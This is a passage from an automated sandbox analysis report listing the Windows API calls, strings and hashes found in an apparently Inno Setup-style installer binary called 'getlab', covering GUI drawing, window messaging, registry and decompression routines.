                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                          • String ID: ,$?
                                                                          • API String ID: 2359071979-2308483597
                                                                          • Opcode ID: e0c9a44165d56187b0795cac699610ea385af12d5fd7003569757b390febdefd
                                                                          • Instruction ID: d8c93b49542c4992b593f331124e59532eba8c65ca5fe63237d6ba0ca55a8ecc
                                                                          • Opcode Fuzzy Hash: e0c9a44165d56187b0795cac699610ea385af12d5fd7003569757b390febdefd
                                                                          • Instruction Fuzzy Hash: 9E510370A00245ABDB10EF6ADD816EA7BF9AF09304B15857BF904E73A2D738DD41CB58
                                                                          APIs
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0041BF20
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0041BF2F
                                                                          • GetBitmapBits.GDI32(?,?,?), ref: 0041BF80
                                                                          • GetBitmapBits.GDI32(?,?,?), ref: 0041BF8E
                                                                          • DeleteObject.GDI32(?), ref: 0041BF97
                                                                          • DeleteObject.GDI32(?), ref: 0041BFA0
                                                                          • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFBD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                          • String ID:
                                                                          • API String ID: 1030595962-0
                                                                          • Opcode ID: a6b868a807f1f599719e52264ea8325182c659afeabb6b194134e5b91d426331
                                                                          • Instruction ID: 4619fcafd17693633a8c31a92518bd0abdf88944d34ea3f3446ff31194e2e661
                                                                          • Opcode Fuzzy Hash: a6b868a807f1f599719e52264ea8325182c659afeabb6b194134e5b91d426331
                                                                          • Instruction Fuzzy Hash: 48510375A00219AFCF10DFA9C8819EEB7F9EF48314B11856AF914E7391D738AD81CB64
                                                                          APIs
                                                                          • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEF6
                                                                          • 73A24620.GDI32(00000000,00000026), ref: 0041CF15
                                                                          • 73A18830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF7B
                                                                          • 73A122A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CF8A
                                                                          • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFF4
                                                                          • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D032
                                                                          • 73A18830.GDI32(?,?,00000001,0041D064,00000000,00000026), ref: 0041D057
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Stretch$A18830$A122A24620BitsMode
                                                                          • String ID:
                                                                          • API String ID: 430401518-0
                                                                          • Opcode ID: c81279b313576d135e7f058ec71da99c22708ae42f226878f0d4e896de0476ba
                                                                          • Instruction ID: 9b717f45caa71cbdb3d7743a5068819f31981c945c02765ea0762fde20f1409d
                                                                          • Opcode Fuzzy Hash: c81279b313576d135e7f058ec71da99c22708ae42f226878f0d4e896de0476ba
                                                                          • Instruction Fuzzy Hash: 17513F70604204AFDB14DFA8C985F9BBBF9EF08304F14459AB545E7692C778ED81CB58
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,?,?), ref: 0045714E
                                                                            • Part of subcall function 00424274: GetWindowTextA.USER32(?,?,00000100), ref: 00424294
                                                                            • Part of subcall function 0041EE9C: GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                                            • Part of subcall function 0041EE9C: 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                                            • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004571B5
                                                                          • TranslateMessage.USER32(?), ref: 004571D3
                                                                          • DispatchMessageA.USER32(?), ref: 004571DC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Message$TextWindow$A25940CurrentDispatchSendThreadTranslate
                                                                          • String ID: [Paused]
                                                                          • API String ID: 3047529653-4230553315
                                                                          • Opcode ID: 80c4c27c4b754fe1519de729eb729efa4ffa2fc2b03d19605f480c373ee661fa
                                                                          • Instruction ID: 4dd0f6a69861fba71970a0c95394483262e0630457e8f7cd4854214566cc162d
                                                                          • Opcode Fuzzy Hash: 80c4c27c4b754fe1519de729eb729efa4ffa2fc2b03d19605f480c373ee661fa
                                                                          • Instruction Fuzzy Hash: EC3196319082449EDB11DFB5EC81B9E7FB8EB49314F5544BBF800E7292D63C9909CB69
                                                                          APIs
                                                                          • GetCursor.USER32(00000000,0046B37F), ref: 0046B2FC
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0046B30A
                                                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B310
                                                                          • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B31A
                                                                          • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B320
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$LoadSleep
                                                                          • String ID: CheckPassword
                                                                          • API String ID: 4023313301-1302249611
                                                                          • Opcode ID: c5bdf5f640806f8796bfbc41b1a4ab00d3ded5bef946e97f85f4201d994c149c
                                                                          • Instruction ID: dcef8ef75e700f151948083f515970cfb06be99f29bdf3d7051495a11b4a934f
                                                                          • Opcode Fuzzy Hash: c5bdf5f640806f8796bfbc41b1a4ab00d3ded5bef946e97f85f4201d994c149c
                                                                          • Instruction Fuzzy Hash: 9D3190347402049FD701EF69C899B9E7BE4EB49304F5580B6B904DB3A2E7789E80CB89
                                                                          APIs
                                                                            • Part of subcall function 00477628: GetWindowThreadProcessId.USER32(00000000), ref: 00477630
                                                                            • Part of subcall function 00477628: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477727,0049C0A4,00000000), ref: 00477643
                                                                            • Part of subcall function 00477628: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477649
                                                                          • SendMessageA.USER32(00000000,0000004A,00000000,00477ABA), ref: 00477735
                                                                          • GetTickCount.KERNEL32 ref: 0047777A
                                                                          • GetTickCount.KERNEL32 ref: 00477784
                                                                          • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004777D9
                                                                          Strings
                                                                          • CallSpawnServer: Unexpected response: $%x, xrefs: 0047776A
                                                                          • CallSpawnServer: Unexpected status: %d, xrefs: 004777C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                          • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                          • API String ID: 613034392-3771334282
                                                                          • Opcode ID: e1b07b7da0dc81f79c626057223c48b53da9c8a9430d466ab72b2e6b955821c4
                                                                          • Instruction ID: 5facb6da61392f64ef9a6a7cc904dffa3fea64199446eda4e4b81d1598b422a3
                                                                          • Opcode Fuzzy Hash: e1b07b7da0dc81f79c626057223c48b53da9c8a9430d466ab72b2e6b955821c4
                                                                          • Instruction Fuzzy Hash: 0131E474F042158ADF10EBB9C8467EEB6A09B08304F90807AB508EB382D67C5E01C79D
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045965F
                                                                          Strings
                                                                          • Fusion.dll, xrefs: 004595FF
                                                                          • CreateAssemblyCache, xrefs: 00459656
                                                                          • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045966A
                                                                          • .NET Framework CreateAssemblyCache function failed, xrefs: 00459682
                                                                          • Failed to load .NET Framework DLL "%s", xrefs: 00459644
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                          • API String ID: 190572456-3990135632
                                                                          • Opcode ID: 6db9dd5a59cee9e125ea37fcdd1d071909f295375ba02b74572753309365d729
                                                                          • Instruction ID: ee3dd963a50cff277cc460556b086b348bcce4d3c12070cda944c03b6b96f9ce
                                                                          • Opcode Fuzzy Hash: 6db9dd5a59cee9e125ea37fcdd1d071909f295375ba02b74572753309365d729
                                                                          • Instruction Fuzzy Hash: 5D315771E00609EBCB01EFA5C88169EB7A5AF44315F50857BE814A7382DB7C9E09CB99
                                                                          APIs
                                                                            • Part of subcall function 0041C040: GetObjectA.GDI32(?,00000018), ref: 0041C04D
                                                                          • GetFocus.USER32 ref: 0041C160
                                                                          • 73A1A570.USER32(?), ref: 0041C16C
                                                                          • 73A18830.GDI32(?,?,00000000,00000000,0041C1EB,?,?), ref: 0041C18D
                                                                          • 73A122A0.GDI32(?,?,?,00000000,00000000,0041C1EB,?,?), ref: 0041C199
                                                                          • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B0
                                                                          • 73A18830.GDI32(?,00000000,00000000,0041C1F2,?,?), ref: 0041C1D8
                                                                          • 73A1A480.USER32(?,?,0041C1F2,?,?), ref: 0041C1E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A18830$A122A480A570BitsFocusObject
                                                                          • String ID:
                                                                          • API String ID: 2231653193-0
                                                                          • Opcode ID: 9c9984a03792254f7cf3ad1787892f213a144d0a64db434cb782e1e94da2dcd6
                                                                          • Instruction ID: 42301c90dcb8571f5cbc3500225c3f0eaf81cc24073f805a24a28427ce123417
                                                                          • Opcode Fuzzy Hash: 9c9984a03792254f7cf3ad1787892f213a144d0a64db434cb782e1e94da2dcd6
                                                                          • Instruction Fuzzy Hash: D7116D71A44618BBDF00DBE9CC81FAFB7FCEB48700F14446AB518E7281DA3899008B28
                                                                          APIs
                                                                          • GetSystemMetrics.USER32(0000000E), ref: 00418C68
                                                                          • GetSystemMetrics.USER32(0000000D), ref: 00418C70
                                                                          • 6F532980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C76
                                                                            • Part of subcall function 004099A8: 6F52C400.COMCTL32(0049B628,000000FF,00000000,00418CA4,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099AC
                                                                          • 6F59CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CC6
                                                                          • 6F59C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD1
                                                                          • 6F59CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000), ref: 00418CE4
                                                                          • 6F530860.COMCTL32(0049B628,00418D07,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E), ref: 00418CFA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: MetricsSystem$C400C740F530860F532980
                                                                          • String ID:
                                                                          • API String ID: 209721339-0
                                                                          • Opcode ID: 3e87c7a23a4a947163f4d2b90e583babc0fab05060521c53009111721e1cf9e6
                                                                          • Instruction ID: c5403bac5749a6cea20ad86aefc03aeb17a2f2ee6000d3a37742d6553dc7a201
                                                                          • Opcode Fuzzy Hash: 3e87c7a23a4a947163f4d2b90e583babc0fab05060521c53009111721e1cf9e6
                                                                          • Instruction Fuzzy Hash: 981124B1B44304BFDB10EBA9EC82F5E73B8DB48714F50406AB504EB2C2DAB99D408659
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004832E0), ref: 004832C5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                          • API String ID: 47109696-2530820420
                                                                          • Opcode ID: 069f94f9fa12544f7a36e7bd85e6d1afcaa647915ea6f8fcf756052135ad9446
                                                                          • Instruction ID: b53b4caf4df369742718f420b864b5eadf64457ff5313130662490eff196aabe
                                                                          • Opcode Fuzzy Hash: 069f94f9fa12544f7a36e7bd85e6d1afcaa647915ea6f8fcf756052135ad9446
                                                                          • Instruction Fuzzy Hash: 7E115130704244AADB10FFA59852B5F7BA8DB55B05F6188B7A800A7282D7389E02871D
                                                                          APIs
                                                                          • SelectObject.GDI32(00000000,?), ref: 0041B468
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B477
                                                                          • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4A3
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041B4B1
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B4BF
                                                                          • DeleteDC.GDI32(00000000), ref: 0041B4C8
                                                                          • DeleteDC.GDI32(?), ref: 0041B4D1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectSelect$Delete$Stretch
                                                                          • String ID:
                                                                          • API String ID: 1458357782-0
                                                                          • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                          • Instruction ID: d121cbdfe682723b668f1aba97a5ca8eb2ba63952d9ca8216d3140e682204302
                                                                          • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                          • Instruction Fuzzy Hash: 46115C72E00619ABDB10DAD9DD85FEFB7BCEF08704F144555B614F7281C678AC418BA8
                                                                          APIs
                                                                          • GetCursorPos.USER32 ref: 004233A7
                                                                          • WindowFromPoint.USER32(?,?), ref: 004233B4
                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233C2
                                                                          • GetCurrentThreadId.KERNEL32 ref: 004233C9
                                                                          • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233E2
                                                                          • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 004233F9
                                                                          • SetCursor.USER32(00000000), ref: 0042340B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                          • String ID:
                                                                          • API String ID: 1770779139-0
                                                                          • Opcode ID: c9ba26483528a121f971c2dd70aae3c664ebef1f4767206ef3dc65e1b1b17165
                                                                          • Instruction ID: 5b5036a29de233914ad27f5bfe0a39b591155b03ca34aa4f0141610fd726b6de
                                                                          • Opcode Fuzzy Hash: c9ba26483528a121f971c2dd70aae3c664ebef1f4767206ef3dc65e1b1b17165
                                                                          • Instruction Fuzzy Hash: 3501D4323046102AD6217B755C82E2F26E8DB85B29F60447FF504BB287DA3DAD11936D
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 00494848
                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00494855
                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00494862
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule
                                                                          • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                          • API String ID: 667068680-2254406584
                                                                          • Opcode ID: 21af07142c53872dca5cd0674b34382539a139ddeec0bf3a3c9dc52e9c6734d9
                                                                          • Instruction ID: 57979f0f623c6713f86cfc51a9e85cc39870524a60e3ac3170e58067450f8277
                                                                          • Opcode Fuzzy Hash: 21af07142c53872dca5cd0674b34382539a139ddeec0bf3a3c9dc52e9c6734d9
                                                                          • Instruction Fuzzy Hash: 68F0F69AB01F5526DA20B5A69C42E7B6ACCCBC17A4F150137FD04B73C2E99C8C0242FD
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D4B1
                                                                          • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D4C1
                                                                          • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D4D1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                          • API String ID: 190572456-212574377
                                                                          • Opcode ID: cecd0a63045edb33e2202c29c90cf8f934e5a60212dd894f2f8d3c432b3cebaf
                                                                          • Instruction ID: 50a43070f27201e9cf87661d87b97551d06431c7276cd5b4b6d770057bc484c9
                                                                          • Opcode Fuzzy Hash: cecd0a63045edb33e2202c29c90cf8f934e5a60212dd894f2f8d3c432b3cebaf
                                                                          • Instruction Fuzzy Hash: 4AF0B2B0D00701DAE724DFB65CC77263A959B6431AF1084379A4D55373D67814498F2D
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004808CA), ref: 0042EA2D
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA33
                                                                          • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA44
                                                                            • Part of subcall function 0042E9A4: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA68,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9BA
                                                                            • Part of subcall function 0042E9A4: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C0
                                                                            • Part of subcall function 0042E9A4: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D1
                                                                          • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA58
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                          • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                          • API String ID: 142928637-2676053874
                                                                          • Opcode ID: 527a2f903435c6b8eae660c7438eac079e405392c9f84945f8436c24f6679cfa
                                                                          • Instruction ID: b6413d45aefc5bd916056b1696ea31cacbebf8ca5ba9e8247451a7316c99a6de
                                                                          • Opcode Fuzzy Hash: 527a2f903435c6b8eae660c7438eac079e405392c9f84945f8436c24f6679cfa
